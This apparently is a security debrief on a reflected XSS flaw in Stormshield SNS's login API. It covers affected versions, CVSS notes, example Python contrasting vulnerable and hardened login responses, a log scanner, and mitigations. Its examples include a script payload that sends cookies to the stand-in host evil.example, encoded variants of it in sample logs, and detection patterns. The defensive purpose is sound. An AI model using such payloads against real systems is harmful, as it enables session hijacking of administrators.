PatchSiren

CVE-2026-8474 Stormshield CVE debrief

A reflected cross-site scripting (XSS) vulnerability exists in the login API of Stormshield Network Security (SNS) appliances. Affected versions are 4.3.0 through 4.3.41, 4.8.0 through 4.8.15, and 5.0.0 through 5.0.5. An attacker who can get a victim to issue a crafted request to the login API can execute script in that victim's browser, enabling theft of cookies or other sensitive data, modification of page behavior, and redirection to malicious websites. The vulnerability was published on June 1, 2026 and carries a CVSS 3.1 base score of 5.3 (Medium). The NVD status is currently Deferred. Stormshield has issued advisory 2026-003 for this issue.

Vendor
Stormshield
Product
Stormshield Network Security (SNS)
CVSS
MEDIUM 5.3
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-01
Original CVE updated
2026-06-01
Advisory published
2026-06-01
Advisory updated
2026-06-01

Who should care

Organizations operating Stormshield Network Security appliances for firewall or network security functions, particularly those whose administration interface is reachable from untrusted networks or used by administrators who also browse the web from the same workstation. Security teams responsible for web application security and network appliance hardening should prioritize patching.

Technical summary

The vulnerability is a reflected cross-site scripting (CWE-79) issue in the login API of Stormshield Network Security appliances. It affects versions 4.3.0–4.3.41, 4.8.0–4.8.15, and 5.0.0–5.0.5. Successful exploitation requires network access to the login API and results in script execution in the victim's browser context, leading to cookie theft, sensitive data exposure, or malicious redirection. The attack does not require authentication per the CVSS vector (PR:N). Note that the published vector also records UI:N and C:N, which does not match the stated cookie-theft impact: a reflected XSS still needs a victim, here an SNS administrator, to open a crafted link or page, and the asset at risk is that administrator's session. Treat the appliance's administrative session as the target regardless of what the vector says.
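To make the bug class concrete, the following is an added example of the reflected-XSS pattern described above, beside two hardened variants (HTML output encoding plus a CSP header, and a JSON API response). It is constructed for this debrief and is not Stormshield code; the parameter name "username", the page layout, and the CSP value are assumptions, and nothing here reflects how the SNS login API is actually implemented.

```python
import html
import json

# Constructed illustration of CWE-79 in a login endpoint: the submitted username
# is reflected into the response. Not Stormshield code; all names are assumed.

# Example headers for the hardened HTML variant. The CSP policy is an assumption,
# not something taken from the SNS appliance.
HARDENED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
}


def login_error_vulnerable(username: str) -> str:
    """Reflects the submitted username verbatim into HTML: the bug class."""
    return f"<html><body><p>Login failed for {username}</p></body></html>"


def login_error_hardened(username: str) -> tuple[dict, str]:
    """Same page, but the value is HTML-escaped before interpolation, so a
    browser renders it as text. The headers add CSP as a second layer that
    blocks inline script even if an encoding bug slips through."""
    safe = html.escape(username, quote=True)
    body = f"<html><body><p>Login failed for {safe}</p></body></html>"
    return HARDENED_HEADERS, body


def login_error_json(username: str) -> tuple[dict, str]:
    """API-style alternative: answer with JSON and a non-HTML content type.
    Angle brackets are additionally written as \\u escapes (still valid JSON)
    so the body stays inert even if a client later embeds it in HTML."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    body = json.dumps({"error": "login failed", "username": username})
    body = body.replace("<", "\\u003c").replace(">", "\\u003e")
    return headers, body


def decode_json_body(body: str) -> dict:
    """Parse a JSON response body; shows the escaped form round-trips intact."""
    return json.loads(body)


# Constructed attacker input of the kind a reflected-XSS link would carry.
PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    print(login_error_vulnerable(PAYLOAD))
    print(login_error_hardened(PAYLOAD)[1])
    print(login_error_json(PAYLOAD)[1])
```

The vulnerable function returns the payload as live markup; the hardened function returns `&lt;script&gt;...` which the browser displays as text; the JSON variant never produces an HTML document at all, which is the right shape for a login API that a JavaScript front end consumes.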

Defensive priority

medium

Recommended defensive actions

  • Apply the fixed SNS releases Stormshield provides under advisory 2026-003 as soon as they are available for your branch (4.3, 4.8 or 5.0)
  • Restrict access to the SNS administration interface and its login API to trusted management networks or a VPN; do not expose it on internet-facing interfaces
  • Monitor access logs for requests to the login API whose parameters carry HTML or script markup, including URL-encoded and double-encoded forms
  • Implement Content Security Policy (CSP) headers where the appliance, or a reverse proxy in front of the administration interface, supports them, to limit what an injected script can do
  • Terminate active administrative sessions and have administrators re-authenticate after patching, since a stolen session cookie stays valid until it expires or is revoked
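As an added example of the monitoring item above (not tooling from Stormshield or from this page), the following scans web-server-style access log lines for requests to the login API whose query string carries script or HTML markup. The endpoint path `/api/auth/login`, the log format (Apache/Nginx "combined"), and the sample lines are all constructed assumptions; the advisory does not name the real SNS endpoint, so adjust `LOGIN_PATH` to match your appliance's logs.

```python
import re
from urllib.parse import unquote, urlsplit

# Hypothetical login API path. The real SNS endpoint is not given in the
# advisory text; set this to what your appliance logs actually show.
LOGIN_PATH = "/api/auth/login"

# Script-injection indicators, matched case-insensitively after URL decoding so
# that %3Cscript%3E and double-encoded %253Cscript%253E are both caught.
XSS_PATTERNS = re.compile(
    r"<\s*script|javascript\s*:|on(?:error|load|mouseover|focus)\s*=|<\s*svg|<\s*img|document\.cookie",
    re.IGNORECASE,
)

# Apache/Nginx combined format: ip ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def full_decode(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) to defeat double encoding; stop once stable."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def scan_log_line(line: str):
    """Return a finding dict for a suspicious login-API request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if full_decode(parts.path) != LOGIN_PATH:
        return None
    decoded_query = full_decode(parts.query)
    hit = XSS_PATTERNS.search(decoded_query)
    if not hit:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("time"),
        "method": m.group("method"),
        "status": m.group("status"),
        "indicator": hit.group(0),
        "query": decoded_query,
    }


def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [r for r in (scan_log_line(l) for l in lines) if r]


# Constructed sample log: one benign login, one plain-encoded script payload,
# one payload against an unrelated path (should not fire), one double-encoded <img onerror>.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jun/2026:10:00:01 +0000] "GET /api/auth/login?user=alice HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jun/2026:10:00:05 +0000] "GET /api/auth/login?user=%3Cscript%3Edocument.location%3D%27http%3A//evil.example/%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jun/2026:10:00:09 +0000] "GET /static/logo.png?v=%3Cscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [01/Jun/2026:10:00:12 +0000] "GET /api/auth/login?user=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 640 "-" "curl/8.0"',
]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Decoding the path as well as the query matters, because `/api/auth/%6Cogin` is the same endpoint to most servers. A POST-based login would carry the payload in the body rather than the query string, which ordinary access logs do not record; for that case the request must be inspected at a proxy or WAF in front of the appliance.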

Evidence notes

The CVE description and NVD record identify Stormshield as the affected vendor and cite advisory 2026-003 as the primary reference. The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N yields a base score of 5.3; its UI:N and C:N metrics are inconsistent with the cookie-theft impact the description states, so the score should be read as a lower bound. NVD vulnerability status is Deferred as of the 2026-06-01 modified timestamp.

Official resources

Stormshield disclosed this reflected XSS vulnerability in the SNS login API via advisory 2026-003. The vulnerability affects multiple release branches and could allow session hijacking or malicious redirection.